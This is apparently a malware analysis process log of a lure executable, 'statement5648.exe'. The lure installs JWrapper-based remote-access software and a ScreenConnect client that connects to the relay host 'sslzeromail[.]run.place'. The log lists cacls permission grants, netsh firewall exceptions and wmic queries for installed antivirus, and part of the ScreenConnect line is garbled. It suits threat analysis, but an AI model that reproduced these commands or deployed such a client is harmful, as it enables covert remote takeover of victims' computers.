| cacls.exe | Remote AccessLauncher.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\LastProxy" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceid.lock" /t /e /g "Users":f |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe" /t /e /p "Users":R |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWApps\Remote_Access_ConfigureICO.ico" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7" /t /e /p "Users":R |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWApps\JWrapper-Remote Access-UninstallerICO.ico" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe" /t /e /p "Users":R |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWApps\ChosenLanguage" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\logs" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe" /t /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml" /e /p "Users":R |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete" /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access" /e /g "Users":F |
| cacls.exe | Remote Access.exe | cacls "C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService" /t /e /g "Users":F |
| cacls.exe | statement5648.exe | cacls "C:\ProgramData\JWrapper-Remote Access\Remote AccessWinLauncher.exe" /e /g "Users":F |
| cmd.exe | wmic.exe | C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH FirewallProduct get |
| cmd.exe | Remote Access.exe | cmd.exe /c netsh advfirewall show all State |
| cmd.exe | wmic.exe | C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiSpywareProduct get |
| cmd.exe | wmic.exe | C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get |
| elev_win.exe | elev_win.exe | "C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe" "C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe" "-cp" "C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar" "-Dsun.java2d.dpiaware=true" "-Djava.library.path=C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete" "com.aem.sdesktop.util.MouseMover" "127.0.0.1" "56936" "127.0.0.1" "56937" "elevated" |
elev_win.exe session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” “–mouselocation”
msiexec.exe Remote Access.exe msiexec.exe /i sc.msi /qn
msiexec.exe services.exe C:\Windows\system32\msiexec.exe /V
msiexec.exe msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 975E1E24ECB9F562B809F458594D14A3 E Global\MSI0000
netsh.exe Remote Access.exe netsh wlan show interfaces
netsh.exe cmd.exe netsh advfirewall show all State
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\java.exe” “SHRemoteAccessServiceJE_2” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\Remote AccessWinLauncher.exe” “SHRemoteAccessServiceMA_1” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “SHRemoteAccessServiceJE_4” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessECompatibility.exe” “SHRemoteAccessServiceJE_5” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessLauncher.exe” “SHRemoteAccessServiceJE_6” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\javaw.exe” “SHRemoteAccessServiceJE_3” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\java-rmi.exe” “SHRemoteAccessServiceJE_1” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe” “SHRemoteAccessServiceSH_3_2” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” “SHRemoteAccessServiceSH_3_1” ENABLE
netsh.exe Remote Access.exe netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” “SHRemoteAccessServiceJE_7” ENABLE
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777397243979-20”
Remote SimpleGatewayService.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib\jwstandalonelaunch.jar” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-3575002851-22”
Remote statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessECompatibility.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\JWLaunchProperties-1777396484051-30”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396698592-20”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396701404-39”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777397247043-39”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396515581-20”
Remote session_win.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396518842-39”
Remote statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396488207-33”
Remote statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessLauncher.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396485879-32”
rundll32.exe msiexec.exe rundll32.exe “C:\Windows\Installer\MSI4209.tmp”,zzzzInvokeManagedCustomActionOutOfProc SfxCA_56509750 2 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
ScreenConnect.ClientService.exe services.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.ClientService.exe” “?e=Access&y=Guest&h=sslzeromail[.]run.place&p=8041&s=1063c106-fb78-4a61-a1c3-959620aa0d1e&k=BgIAAACkAABSU0ExAAgAAAEAAQAtB7xpgSSY0vmCVpwxcuZIThe system cannot find the file specified. fax8SzUK6ZHTngAMzp7yIqVypKK1lThe system cannot find the file specified. bwoyeosThe system cannot find the file specified. b5yThe system cannot find the file specified. fXThe system cannot find the file specified. bEcYDldPOGOThe system cannot find the file specified. b3BseeSeaeo44ykXwdThe system cannot find the file specified. blThe system cannot find the file specified. fa8k24jRIn74Gp2The system cannot find the file specified. b6qNTThe system cannot find the file specified. bpaZaHOThe system cannot find the file specified. fbUva6NBdH5pUcuaDkXzZywacRkvVQa8BOn3uumi7zc0IO44QZboES72PcThe system cannot find the file specified. frxJcuAMThe system cannot find the file specified. f65GGaOEJ4x8ilqcKaquAr0uKFGbaglfYDyCV8kqRaw2L1ucF3The system cannot find the file specified. b22DuwyIwzXd5HwpBsq94euEbHbtNMk4QThe system cannot find the file specified. fDThe system cannot find the file specified. fefxQBPwDqhjWThe system cannot find the file specified. bW2NU99bR16tNqqMbeolXIToecThe system cannot find the file specified. bB9CZ9abJuZES6ULML512IN3phqQZKv&t=&c=crypto&c=&c=&c=&c=&c=&c=&c=”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “87140605-5d2c-4a7d-9c4a-781ac7f07691” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “0d393de2-f5aa-4318-9563-b659faff1a49” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “9dad62c5-42a7-4f31-b383-22ecbad23c7a” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “426d2985-183b-4d41-9abc-f24af794a2db” “User”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “f00ff167-e6f2-44ad-9ccb-e30f6906d0f2” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “1c5eeb04-e194-44a1-b466-87bab51ce23f” “System”
ScreenConnect.WindowsClient.exe ScreenConnect.ClientService.exe “C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “add529c0-e532-4f23-84dd-6671686c303e” “System”
SecurityHealthSystray.exe explorer.exe “C:\Windows\System32\SecurityHealthSystray.exe”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” –slWaitForCompletion “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” –mouselocation
session_win.exe Remote Access Monitoring.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396518842-39”
session_win.exe Remote Access Monitoring.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396701404-39”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777397243979-20”
session_win.exe Remote Access Monitoring.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777397247043-39”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396515581-20”
session_win.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396698592-20”
SimpleGatewayService.exe SimpleService.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe”
SimpleService.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” -uninstall “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\simplegateway.service”
SimpleService.exe Remote Access.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” -install “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\simplegateway.service”
SimpleService.exe services.exe “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe”
statement5648.exe explorer.exe “C:\Users\###########\Downloads\statement5648.exe”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\jaccess.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\jaccess.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\rt.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\rt.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\jsse.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\jsse.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\access-bridge-64.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\access-bridge-64.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunec.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunec.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\alt-rt.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\alt-rt.jar”
unpack200.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunmscapi.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunmscapi.jar”
windowslauncher.exe windowslauncher.exe “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Dsun.java2d.dpiaware=true “-Djava.library.path=C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete” com.aem.sdesktop.util.MouseMover 127.0.0.1 56940 127.0.0.1 56941 elevated_backup
windowslauncher.exe statement5648.exe “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\windowslauncher.exe” “-Xshare:dump”
wmic.exe Remote Access.exe wmic.exe /namespace:\\root\SecurityCenter2 PATH FirewallProduct get
